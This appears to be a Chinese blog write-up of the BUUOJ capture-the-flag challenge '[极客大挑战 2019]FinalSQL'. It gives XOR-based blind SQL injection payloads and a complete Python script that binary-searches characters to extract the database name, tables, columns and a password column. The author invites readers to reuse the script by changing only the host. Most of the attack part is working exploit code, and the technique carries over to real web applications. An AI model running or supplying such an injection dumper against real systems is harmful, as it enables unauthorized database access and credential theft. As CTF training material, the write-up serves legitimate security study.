[极客大挑战 2019]FinalSQL

最新推荐文章于 2024-03-16 07:00:00 发布

sillyboy_lch

最新推荐文章于 2024-03-16 07:00:00 发布

阅读量2.3k

点赞数 2

分类专栏： web安全 SQL注入文章标签：安全其他

本文链接：https://blog.csdn.net/weixin_42513429/article/details/105520763

版权

web安全同时被 2 个专栏收录

9 篇文章 0 订阅

订阅专栏

SQL注入

3 篇文章 0 订阅

订阅专栏

[极客大挑战 2019]FinalSQL

盲注

盲注比较麻烦，这个题尤为恶心，flag藏得好深，有点坑

首先查询数据库名
python脚本核心payload：

"id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid)

查询数据库

获取表名

"id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1))<%d)^1" % (i,mid)

获取列名

"id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%d,1))<%d)^1" % (i,mid)

查询列名

脱裤

"id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))<%d)^1" % (i,mid)

我写的脚本，代码大量重复，可以适当精简，使用的话只需要改一下buuoj的地址，即host

import requests
import time

host = "http://fee43433-27fd-46b5-9459-b6ec77f6728a.node3.buuoj.cn/search.php?"

def getDatabase():  #获取数据库名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url = host + "id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid)
            res = requests.get(url)
            if "others~~~" in res.text: 
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("database is -> "+ans)

def getTable(): #获取表名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url = host + "id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1))<%d)^1" % (i,mid)
            res = requests.get(url)
            if "others~~~" in res.text: 
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("table is -> "+ans)

def getColumn(): #获取列名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url = host + "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%d,1))<%d)^1" % (i,mid)
            res = requests.get(url)
            if "others~~~" in res.text: 
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("column is -> "+ans)

def dumpTable():#脱裤
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url = host + "id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))<%d)^1" % (i,mid)
            res = requests.get(url)
            if "others~~~" in res.text: 
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("dumpTable is -> "+ans)

dumpTable()

sillyboy_lch

关注

2
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
[极客大挑战 2019]FinalSQL

[极客大挑战 2019]FinalSQL盲注盲注比较麻烦，这个题尤为恶心，flag藏得好深，有点坑首先查询数据库名python脚本核心payload："id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid) ![查询数据库](https://img-blog.csdnimg.cn/202004142054...
复制链接

扫一扫